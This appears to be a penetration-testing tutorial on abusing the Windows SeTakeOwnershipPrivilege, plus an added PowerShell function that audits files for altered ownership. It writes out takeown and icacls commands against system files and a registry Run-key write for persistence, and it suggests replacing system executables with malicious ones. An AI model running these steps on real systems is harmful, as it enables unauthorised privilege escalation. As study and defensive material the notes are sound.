# SeTakeOwnershipPrivilege

#### **What is SeTakeOwnershipPrivilege?**

* **SeTakeOwnershipPrivilege** is a Windows privilege that allows users to take ownership of objects, such as files, folders, or registry keys, even if they do not have explicit permissions to do so. Once ownership is taken, the user can modify the object's permissions to grant themselves full control, effectively bypassing access restrictions.
* **Key Command:**
  * `whoami /priv` → Lists the privileges held in your current access token and shows whether **SeTakeOwnershipPrivilege** is present and enabled.

#### **Exploiting SeTakeOwnershipPrivilege**

If a user has **SeTakeOwnershipPrivilege**, they can take control of sensitive objects like system files or critical processes and modify their permissions to gain access or execute arbitrary commands. Here's how you can exploit this privilege to escalate your privileges:

```
PS C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                              State
============================= ======================================================= ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects                Disabled
```

If the privilege is listed as `Disabled`, it is present in the token but not yet turned on. We can enable it using this script: <https://github.com/proxb/PoshPrivilege/blob/master/PoshPrivilege/Scripts/Enable-Privilege.ps1>

```
PS C:\> Import-Module .\Enable-Privilege.ps1
PS C:\> .\EnableAllTokenPrivs.ps1
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
```

## **1. Taking Ownership of Files or Directories**

**SeTakeOwnershipPrivilege** allows you to change ownership of a file or folder, giving you the ability to modify or access restricted files. After taking ownership, you can change its **Discretionary Access Control List (DACL)** to grant yourself full control.

**Steps to Exploit SeTakeOwnershipPrivilege on Files:**

1. **Take Ownership of a File or Directory:**

   Use the `takeown` command to take ownership of a file or directory.

   **Command:**

   ```cmd
   takeown /F <file_or_folder_path>
   ```

   Example:

   ```cmd
   takeown /F C:\Windows\System32\drivers\etc\hosts
   ```

   This command changes the ownership of the specified file to your user account.
2. **Grant Yourself Full Control Over the File:**

   After taking ownership, modify the file's permissions using the `icacls` command to give yourself full control.

   **Command:**

   ```cmd
   icacls <file_or_folder_path> /grant <username>:F
   ```

   Example:

   ```cmd
   icacls C:\Windows\System32\drivers\etc\hosts /grant <username>:F
   ```

   * **/grant** `<username>:F` → Grants the specified user full control (`F`) over the file.
3. **Modify or Access the File:**

   After granting yourself full control, you can now edit, delete, or access the file as needed. For example, you can now modify sensitive system files like `hosts`, or even replace system executables with malicious ones to gain SYSTEM-level privileges.
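
To check a directory for the traces these steps leave behind (a changed owner and an explicit Full Control entry), the following audit function is an added example, not part of the original notes. `Find-OwnershipAnomaly` is a hypothetical name, and the expected-owner list is an assumption based on English account names on a default install.

```powershell
# Added example: flag files whose owner or DACL looks like the result of
# "takeown /F" followed by "icacls /grant <user>:F".
function Find-OwnershipAnomaly {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        # Assumed baseline owners; adjust for your environment or locale.
        [string[]]$ExpectedOwner = @(
            'NT SERVICE\TrustedInstaller',
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators'
        )
    )
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl

    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $item = $_
            try   { $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction Stop }
            catch { return }   # ACL not readable: skip this file

            # takeown leaves the invoking account as owner
            $ownerOk = $ExpectedOwner -contains $acl.Owner

            # icacls /grant adds an explicit (non-inherited) Allow ACE
            $explicitFull = @($acl.Access | Where-Object {
                -not $_.IsInherited -and
                $_.AccessControlType -eq 'Allow' -and
                $_.FileSystemRights.HasFlag($full) -and
                $ExpectedOwner -notcontains $_.IdentityReference.Value
            })

            if (-not $ownerOk -or $explicitFull.Count -gt 0) {
                [pscustomobject]@{
                    Path                = $item.FullName
                    Owner               = $acl.Owner
                    UnexpectedOwner     = -not $ownerOk
                    ExplicitFullControl = ($explicitFull.IdentityReference.Value -join ', ')
                }
            }
        }
}

# Audit the directory used in the example above
Find-OwnershipAnomaly -Path "$env:SystemRoot\System32\drivers\etc" | Format-Table -AutoSize
```

Run it from an elevated prompt so every ACL is readable; an empty result means no file under the path deviates from the assumed baseline.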

## **2. Taking Ownership of Registry Keys**

You can also use **SeTakeOwnershipPrivilege** to modify ownership and permissions of critical registry keys, which may allow you to escalate privileges.

**Steps to Exploit Registry Keys:**

1. **Take Ownership of a Registry Key:**

   Use **regedit** or `PowerShell` to change the ownership of a registry key. You can take ownership of sensitive keys such as those related to user accounts, services, or startup configurations.

   **Example in PowerShell:**

   ```powershell
   Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "<key>" -Value "<value>"
   ```

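   Note that `Set-ItemProperty` writes a value under the key rather than changing its owner; it succeeds only once your account owns the key or has been granted write access to it, at which point startup settings or other critical configurations can be modified.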
2. **Modify Permissions:**

   After taking ownership, modify the permissions to grant yourself full control. You can now alter the key's values to execute malicious code, start services with SYSTEM privileges, or add new startup entries.
